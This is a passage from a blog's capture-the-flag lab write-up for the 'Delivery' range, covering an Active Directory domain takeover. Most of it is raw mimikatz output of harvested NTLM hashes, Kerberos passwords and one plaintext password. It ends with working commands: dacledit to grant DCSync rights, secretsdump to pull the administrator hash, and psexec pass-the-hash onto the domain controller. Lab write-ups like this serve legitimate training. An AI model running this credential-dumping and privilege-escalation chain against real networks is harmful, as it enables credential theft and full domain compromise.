* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 24203 (00000000:00005e8b)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 15522599 (00000000:00ecdb27)
Session : RemoteInteractive from 2
User Name : hey
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/3/4 20:59:12
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : hey
* Domain : WIN-HAUWOLAO
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 15499892 (00000000:00ec8274)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 20:59:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 86039 (00000000:00015017)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/3/4 18:58:45
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52703 (00000000:0000cddf)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/3/4 18:58:42
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
mimikatz(commandline) # exit
Bye!
```

Captured CHENGLEI's NTLM

```text
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
```

Use this NTLM to modify his own ACL so that he has DCSync rights

```shell
proxychains4 -q python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
```

Use DCSync to dump the domain controller's credentials

```shell
proxychains4 -q python3 secretsdump.py xiaorang.lab/chenglei@172.22.13.6 -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-user administrator
```

PtH to get the flag

```shell
proxychains4 -q python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a administrator@172.22.13.6
```

```powershell
type C:\Users\Administrator\flag\flag04.txt
```


春秋云境-Delivery
https://www.smal1.black/春秋云境-Delivery.html
Author: Small Black
Published: 2024-03-04